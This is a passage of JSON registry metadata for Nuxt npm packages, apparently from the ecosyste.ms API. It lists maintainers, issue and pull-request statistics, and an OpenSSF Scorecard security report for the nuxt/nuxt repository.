uthors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-nightly/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-nightly/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-nightly/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-nightly/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-nightly/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-nightly/codemeta","maintainers":[{"uuid":"nuxt.bot","login":"nuxt.bot","name":null,"email":"pyapar+nuxtbot@gmail.com","url":null,"packages_count":22,"html_url":"https://www.npmjs.com/~nuxt.bot","role":null,"created_at":"2023-07-24T12:09:25.322Z","updated_at":"2023-07-24T12:09:25.322Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxt.bot/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2023-07-20T11:40:07.788Z","updated_at":"2023-07-20T11:40:07.788Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-10-12T13:50:50.347Z","updated_at":"2023-10-12T13:50:50.347Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096073,"name":"@nuxt/builder","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":68,"first_release_published_at":"2018-11-16T14:15:50.658Z","latest_release_published_at":"2024-06-28T11:34:05.522Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-10T09:28:31.670Z","created_at":"2022-04-08T10:39:21.128Z","updated_at":"2026-05-10T13:08:30.832Z","registry_url":"https://www.npmjs.com/package/@nuxt/builder","install_command":"npm install @nuxt/builder","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-10T13:08:30.806Z","dependent_packages_count":13,"downloads":574169,"downloads_period":"last-month","dependent_repos_count":56772,"rankings":{"downloads":0.2462889302747159,"dependent_repos_count":0.12635157107576978,"dependent_packages_count":1.6674475587966937,"stargazers_count":0.15447521562107158,"forks_count":0.5200789827399681,"docker_downloads_count":0.43739883261343837,"average":0.5253401818536095},"purl":"pkg:npm/%40nuxt/builder","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/builder","docker_dependents_count":252,"docker_downloads_count":1373618,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/builder","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/builder/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://is